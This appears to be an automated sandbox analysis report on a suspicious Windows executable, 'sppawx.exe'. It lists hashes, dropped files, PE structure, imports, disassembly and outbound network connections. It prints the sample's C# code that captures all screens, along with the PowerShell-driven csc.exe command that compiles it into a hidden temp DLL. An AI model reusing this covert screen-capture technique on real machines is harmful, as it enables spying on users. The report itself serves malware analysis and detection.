                                                                                                                                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...v.e.b.z.h.w.c.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...v.e.b.z.h.w.c.p...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1004
                                                                                                                                                                                                                            Entropy (8bit):4.154581034278981
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                                                                                                            MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                                                                                                            SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                                                                                            SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                                                                                            SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):607
                                                                                                                                                                                                                            Entropy (8bit):5.341776581640828
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6KOkuqy776SE71xBkuqTM3RDwA+iM3RLB5sZ23e:p37Lvkmb6KOkqe1xBkrk+ikGcGWZE6cb
                                                                                                                                                                                                                            MD5:807E4C9FBB4024285F51DC1559114AFA
                                                                                                                                                                                                                            SHA1:80BE7D6F9C685C04636FB9BD56645A975F0258EA
                                                                                                                                                                                                                            SHA-256:FD0B4AE20370793F9A1293F457BB0426E360F6FD53E18199B90893B62C2D4052
                                                                                                                                                                                                                            SHA-512:4D6DFC6B490A08E610DBF56002AAE630DDEBC6F9DA0E8F7491A2D60687709D309AFE7665A3F37DBCB0AAD2D6139065C5CC526BCE151D6613850E182F429CDDEA
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.0.cs"
                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):4096
                                                                                                                                                                                                                            Entropy (8bit):3.1617480018116106
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:6tE7oEAtf0KhzBU/Hf6mtJsN00pW1ulta3Rq:YDNz0im0OSfK
                                                                                                                                                                                                                            MD5:0D9DC2C4438071D3DE2CD489C0342F56
                                                                                                                                                                                                                            SHA1:BA50E0F379193C5DBEF4898A5CF44BC8604FB6F9
                                                                                                                                                                                                                            SHA-256:A265BBF62B81EA8A1394BA75792D788310E38203939973A25832F0AC212F38F4
                                                                                                                                                                                                                            SHA-512:2DA10AF0749E5153EC9C3D56C889D526FC4F2325101DF1C44C40A3F92E1029513B792CFABC9FA391DDA10A21EB206F108407B471408C78B05D4704DC9C724FC2
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....[g...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                            Size (bytes):1149
                                                                                                                                                                                                                            Entropy (8bit):5.487345154519278
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:K1cnmId3ka6KOkqeFkGcXE6caKax5DqBVKVrdFAMBJTH:hnmkka6NkqeFkNXEhaK2DcVKdBJj
                                                                                                                                                                                                                            MD5:8C578ED822DCD7199F54FF0B57B64FDD
                                                                                                                                                                                                                            SHA1:EEA727E044FFF2983B3271CD3168F6A05F350F96
                                                                                                                                                                                                                            SHA-256:866E6F930BAC190A09B9F456211B0CA29733A74A2049D24CA816770E9C0C89D3
                                                                                                                                                                                                                            SHA-512:C346A5FA4F4D88D26CDB597EC51A6EB9A6AA86CF0DF0F0CD88914005E4B3BC91DD96358BFE951D2B1809FA021721FC0BD039CBA5D0CD11E29AE57ABCDCCFC9CE
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longe
                                                                                                                                                                                                                            Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                            Size (bytes):2464
                                                                                                                                                                                                                            Entropy (8bit):3.2466774130035625
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:QOaqdmuF3rc/Qh3+kWReHgHttUKlDENh+pyMySn6tUKlDENh+pyMySwwIPVxcwIw:FaqdF7cYh3+AAHdKoqKFxcxkFOYht
                                                                                                                                                                                                                            MD5:612A743078BDBF0F0430129C844E0777
                                                                                                                                                                                                                            SHA1:70501C38B3B008359C2C06753D4DA589FF20F0F5
                                                                                                                                                                                                                            SHA-256:B869C8CCB0B0639A268FE96FD5172DD5334834D50EF7ED812BCBDE560C62FE6C
                                                                                                                                                                                                                            SHA-512:885E81A082A79D515D5444912E28326B1D44EB426761A62A9AC380B5D3A06D697C524C2501542CD1DD22AB912B68A5CBFBA50E0FA00AFA7236E47BF833BF9007
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. D.e.c. .. 1.3. .. 2.0.2.4. .0.2.:.3.8.:.5.3.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.
                                                                                                                                                                                                                            Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):97
                                                                                                                                                                                                                            Entropy (8bit):4.331807756485642
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
                                                                                                                                                                                                                            MD5:195D02DA13D597A52F848A9B28D871F6
                                                                                                                                                                                                                            SHA1:D048766A802C61655B9689E953103236EACCB1C7
                                                                                                                                                                                                                            SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
                                                                                                                                                                                                                            SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...
                                                                                                                                                                                                                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Entropy (8bit):7.993046489499868
                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                            • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                            • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                            File name:sppawx.exe
                                                                                                                                                                                                                            File size:7'834'524 bytes
                                                                                                                                                                                                                            MD5:546606959cb5b178d679b203d938cf88
                                                                                                                                                                                                                            SHA1:f907e7d19734bf7459388b3299822858f0039711
                                                                                                                                                                                                                            SHA256:5184b92097feeecf09d4e92b58c252333d397b3b7c424b62e73ae2fc2f6be405
                                                                                                                                                                                                                            SHA512:be3efba75f20cffbad2b5209e308e95aca31861b8dff5461ce386f10d8276caf73a827bcf415120c07feff815f7099aa29f2b55b22b01301def62d75f478439c
                                                                                                                                                                                                                            SSDEEP:196608:JNLjv+bhqNVoBLD7fEXEoYbiIv9pvvk9fIiZ1jk:TL+9qz8LD7fEUbiIqQgpk
                                                                                                                                                                                                                            TLSH:9086335862A80CF1EE76403DD7A6DC8BDB76B8026710C9CF17A563266E27CC5843BB71
                                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d..
                                                                                                                                                                                                                            Icon Hash:212303032313271a
                                                                                                                                                                                                                            Entrypoint:0x14000ce20
                                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                            Time Stamp:0x675566A3 [Sun Dec 8 09:28:03 2024 UTC]
                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                            OS Version Major:6
                                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                                            File Version Major:6
                                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                                            Import Hash:72c4e339b7af8ab1ed2eb3821c98713a
                                                                                                                                                                                                                            Signature Valid:false
                                                                                                                                                                                                                            Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
                                                                                                                                                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                            Error Number:-2146869232
                                                                                                                                                                                                                            Not Before, Not After
                                                                                                                                                                                                                            • 28/09/2021 20:00:00 28/09/2024 19:59:59
                                                                                                                                                                                                                            Subject Chain
                                                                                                                                                                                                                            • CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
                                                                                                                                                                                                                            Version:3
                                                                                                                                                                                                                            Thumbprint MD5:5C82B2D08EFE6EE0794B52D4309C5F37
                                                                                                                                                                                                                            Thumbprint SHA-1:3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
                                                                                                                                                                                                                            Thumbprint SHA-256:60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
                                                                                                                                                                                                                            Serial:00BFB15001BBF592D4962A7797EA736FA3
                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            sub esp, 28h
                                                                                                                                                                                                                            call 00007F667C82DA4Ch
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            add esp, 28h
                                                                                                                                                                                                                            jmp 00007F667C82D66Fh
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            sub esp, 28h
                                                                                                                                                                                                                            call 00007F667C82DE18h
                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                            je 00007F667C82D813h
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            mov eax, dword ptr [00000030h]
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                                            jmp 00007F667C82D7F7h
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            cmp ecx, eax
                                                                                                                                                                                                                            je 00007F667C82D806h
                                                                                                                                                                                                                            xor eax, eax
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            cmpxchg dword ptr [0003570Ch], ecx
                                                                                                                                                                                                                            jne 00007F667C82D7E0h
                                                                                                                                                                                                                            xor al, al
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            add esp, 28h
                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                            mov al, 01h
                                                                                                                                                                                                                            jmp 00007F667C82D7E9h
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            sub esp, 28h
                                                                                                                                                                                                                            test ecx, ecx
                                                                                                                                                                                                                            jne 00007F667C82D7F9h
                                                                                                                                                                                                                            mov byte ptr [000356F5h], 00000001h
                                                                                                                                                                                                                            call 00007F667C82CF45h
                                                                                                                                                                                                                            call 00007F667C82E230h
                                                                                                                                                                                                                            test al, al
                                                                                                                                                                                                                            jne 00007F667C82D7F6h
                                                                                                                                                                                                                            xor al, al
                                                                                                                                                                                                                            jmp 00007F667C82D806h
                                                                                                                                                                                                                            call 00007F667C83AD4Fh
                                                                                                                                                                                                                            test al, al
                                                                                                                                                                                                                            jne 00007F667C82D7FBh
                                                                                                                                                                                                                            xor ecx, ecx
                                                                                                                                                                                                                            call 00007F667C82E240h
                                                                                                                                                                                                                            jmp 00007F667C82D7DCh
                                                                                                                                                                                                                            mov al, 01h
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            add esp, 28h
                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            inc eax
                                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            sub esp, 20h
                                                                                                                                                                                                                            cmp byte ptr [000356BCh], 00000000h
                                                                                                                                                                                                                            mov ebx, ecx
                                                                                                                                                                                                                            jne 00007F667C82D859h
                                                                                                                                                                                                                            cmp ecx, 01h
                                                                                                                                                                                                                            jnbe 00007F667C82D85Ch
                                                                                                                                                                                                                            call 00007F667C82DD8Eh
                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                            je 00007F667C82D81Ah
                                                                                                                                                                                                                            test ebx, ebx
                                                                                                                                                                                                                            jne 00007F667C82D816h
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            lea ecx, dword ptr [000356A6h]
                                                                                                                                                                                                                            call 00007F667C83AB42h
                                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3ca340x78.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x470000x32c0.rsrc
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x440000x2238.pdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x7767540x2448
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x4b0000x764.reloc
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x3a0800x1c.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39f400x140.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x2b0000x4a0.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                            .text0x10000x29f700x2a000b8c3814c5fb0b18492ad4ec2ffe0830aFalse0.5518740699404762data6.489205819736506IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .rdata0x2b0000x12a280x12c00dcb588e4dcd50b957dfec9051054ec3fFalse0.5243229166666666data5.750765495162648IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .data0x3e0000x53f80xe00dba0caeecab624a0ccc0d577241601d1False0.134765625data1.8392217063172436IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                            .pdata0x440000x22380x24009cd1eac931545f28ab09329f8bfce843False0.4697265625data5.2645170849678795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .rsrc0x470000x32c00x3400dfc07f3b2591bb154fb9567147b84012False0.8291015625data7.464053157469813IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .reloc0x4b0000x7640x800816c68eeb419ee2c08656c31c06a0fffFalse0.5576171875data5.2809528666624175IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                            RT_ICON0x472500x1c1PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.024498886414254
                                                                                                                                                                                                                            RT_ICON0x474140x20cPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0209923664122138
                                                                                                                                                                                                                            RT_ICON0x476200x273PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0175438596491229
                                                                                                                                                                                                                            RT_ICON0x478940x434PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0102230483271375
                                                                                                                                                                                                                            RT_ICON0x47cc80x53ePNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced1.0081967213114753
                                                                                                                                                                                                                            RT_ICON0x482080x9b9PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced1.004419445560466
                                                                                                                                                                                                                            RT_ICON0x48bc40xdc3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.930456996877661
                                                                                                                                                                                                                            RT_GROUP_ICON0x499880x68data0.7403846153846154
                                                                                                                                                                                                                            RT_VERSION0x499f00x3c0data0.45416666666666666
                                                                                                                                                                                                                            RT_MANIFEST0x49db00x50dXML 1.0 document, ASCII text0.4694508894044857
                                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                                            USER32.dllCreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                                                                                                                                                            COMCTL32.dll
                                                                                                                                                                                                                            KERNEL32.dllGetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
                                                                                                                                                                                                                            ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                                                                                                                                                                                            GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW
                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                            Dec 13, 2024 08:38:02.365442991 CET4971680192.168.2.11208.95.112.1
                                                                                                                                                                                                                            Dec 13, 2024 08:38:02.485296965 CET8049716208.95.112.1192.168.2.11
                                                                                                                                                                                                                            Dec 13, 2024 08:38:02.488701105 CET4971680192.168.2.11208.95.112.1
                                                                                                                                                                                                                            Dec 13, 2024 08:38:02.489600897 CET4971680192.168.2.11208.95.112.1
                                                                                                                                                                                                                            Dec 13, 2024 08:38:02.609486103 CET8049716208.95.112.1192.168.2.11
                                                                                                                                                                                                                            Dec 13, 2024 08:38:03.619998932 CET8049716208.95.112.1192.168.2.11
                                                                                                                                                                                                                            Dec 13, 2024 08:38:03.621012926 CET4971680192.168.2.11208.95.112.1
                                                                                                                                                                                                                            Dec 13, 2024 08:38:03.859503031 CET8049716208.95.112.1192.168.2.11
                                                                                                                                                                                                                            Dec 13, 2024 08:38:03.861222982 CET4971680192.168.2.11208.95.112.1
                                                                                                                                                                                                                            Dec 13, 2024 08:38:35.941164970 CET4979580192.168.2.11208.95.112.1
